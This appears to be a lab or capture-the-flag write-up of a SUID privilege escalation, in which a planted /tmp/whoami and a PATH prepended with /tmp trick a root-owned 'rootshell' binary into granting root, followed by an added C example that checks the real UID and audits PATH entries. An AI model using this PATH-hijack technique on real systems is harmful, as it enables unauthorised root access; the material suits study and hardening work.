SUID file

Upon checking the /home/tom directory, I found an interesting file, rootshell.c, and a compiled file, rootshell, that has SUID permissions.

According to the code, it executes the whoami file and checks whether the current user is tom. If the current user is tom, it escalates to the highest privilege; otherwise it only prints the username-id of the current user.

Create a whoami file in the /tmp directory and make it executable.

cd /tmp
echo 'printf "tom"' > whoami
chmod +x whoami

Prepend the /tmp directory to the PATH on the target system, so that the whoami file in /tmp is found first, and check that the PATH has changed.

export PATH=/tmp:$PATH
echo $PATH

Execute rootshell.

cd /home/tom
./rootshell
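
The weakness used above is a SUID binary that runs whoami by name and therefore trusts the caller's PATH. As an added example (not the rootshell.c from the box and not the author's code), this C sketch shows the hardened form of that check, which reads the real UID directly, and a small audit that flags PATH entries where another user could plant a binary. The function names are hypothetical and the "/tmp:/usr/bin" value in main is constructed.

```c
#define _POSIX_C_SOURCE 200809L
#include <pwd.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 if the real UID's passwd name equals `name`. The UID comes from the
 * kernel, not from running `whoami`, so the caller's PATH has no influence. */
int real_user_is(const char *name)
{
    struct passwd *pw = getpwuid(getuid());
    return pw != NULL && strcmp(pw->pw_name, name) == 0;
}

/* 1 if a PATH entry lets another user plant a binary: empty or relative
 * (resolved against the current directory), or world-writable like /tmp. */
int path_entry_unsafe(const char *dir)
{
    struct stat st;
    if (dir[0] != '/')
        return 1;
    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode))
        return 0;   /* not a directory right now; parents are not checked */
    return (st.st_mode & S_IWOTH) != 0;
}

/* Number of unsafe entries in a colon-separated PATH string. */
int count_unsafe_path_entries(const char *path)
{
    int unsafe = 0;
    for (const char *p = path;;) {
        char dir[4096];
        size_t len = strcspn(p, ":");            /* length of this entry */
        size_t n = len < sizeof dir ? len : sizeof dir - 1;
        memcpy(dir, p, n);
        dir[n] = '\0';
        unsafe += path_entry_unsafe(dir);
        if (p[len] == '\0') break;
        p += len + 1;                             /* skip the ':' */
    }
    return unsafe;
}

int main(void)
{
    printf("unsafe=%d tom=%d\n", count_unsafe_path_entries("/tmp:/usr/bin"), real_user_is("tom"));
    return 0;
}
```

A set-uid program that must still run a helper should call it by absolute path and reset PATH to a fixed value first.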